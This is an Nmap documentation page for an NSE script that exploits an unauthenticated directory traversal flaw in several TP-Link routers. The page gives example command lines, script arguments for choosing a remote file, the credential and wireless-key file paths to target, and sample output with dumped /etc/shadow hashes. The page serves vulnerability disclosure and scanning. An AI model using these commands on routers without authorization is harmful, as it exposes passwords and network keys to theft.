Home page logo
/
Intro Reference Guide Book Install Guide
Download Changelog Zenmap GUI Docs
Bug Reports OS Detection Propaganda Related Projects
In the Movies In the News

File http-tplink-dir-traversal

Script types: portrule
Categories: vuln, exploit
Download: http://nmap.org/svn/scripts/http-tplink-dir-traversal.nse

User Summary

Exploits a directory traversal vulnerability existing in several TP-Link wireless routers. Attackers may exploit this vulnerability to read any of the configuration and password files remotely and without authentication.

This vulnerability was confirmed in models WR740N, WR740ND and WR2543ND but there are several models that use the same HTTP server so I believe they could be vulnerable as well. I appreciate any help confirming the vulnerability in other models.

Advisory:

Other interesting files:

  • /tmp/topology.cnf (Wireless configuration)
  • /tmp/ath0.ap_bss (Wireless encryption key)

Script Arguments

http-tplink-dir-traversal.rfile

Remote file to download. Default: /etc/passwd

http-tplink-dir-traversal.outfile

If set it saves the remote file to this location.

Other arguments you might want to use with this script:

  • http.useragent - Sets user agent

http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

vulns.showall

See the documentation for the vulns library.

Example Usage

  • nmap -p80 --script http-tplink-dir-traversal.nse <target>
  • nmap -p80 -Pn -n --script http-tplink-dir-traversal.nse <target>
  • nmap -p80 --script http-tplink-dir-traversal.nse --script-args rfile=/etc/topology.conf -d -n -Pn <target>
    

Script Output

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-tplink-dir-traversal:
|   VULNERABLE:
|   Path traversal vulnerability in several TP-Link wireless routers
|     State: VULNERABLE (Exploitable)
|     Description:
|       Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device.
|       This vulnerability can be exploited remotely and without authentication.
|       Confirmed vulnerable models: WR740N, WR740ND, WR2543ND
|       Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,MR3220,MR3020,WR841N.
|     Disclosure date: 2012-06-18
|     Extra information:
|       /etc/shadow :
|
|   root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|   Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|   bin::10933:0:99999:7:::
|   daemon::10933:0:99999:7:::
|   adm::10933:0:99999:7:::
|   lp:*:10933:0:99999:7:::
|   sync:*:10933:0:99999:7:::
|   shutdown:*:10933:0:99999:7:::
|   halt:*:10933:0:99999:7:::
|   uucp:*:10933:0:99999:7:::
|   operator:*:10933:0:99999:7:::
|   nobody::10933:0:99999:7:::
|   ap71::10933:0:99999:7:::
|
|     References:
|_      http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740

Requires


Author: Paulino Calderon <calderon@websec.mx>

License: Same as Nmap--See http://nmap.org/book/man-legal.html

action

action (host, port)

MAIN - The script checks for vulnerable devices by attempting to read "etc/shadow" and finding the pattern "root:".

Parameters

  • host:
  • port:

Nmap Site Navigation

Intro Reference Guide Book Install Guide
Download Changelog Zenmap GUI Docs
Bug Reports OS Detection Propaganda Related Projects
In the Movies In the News
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]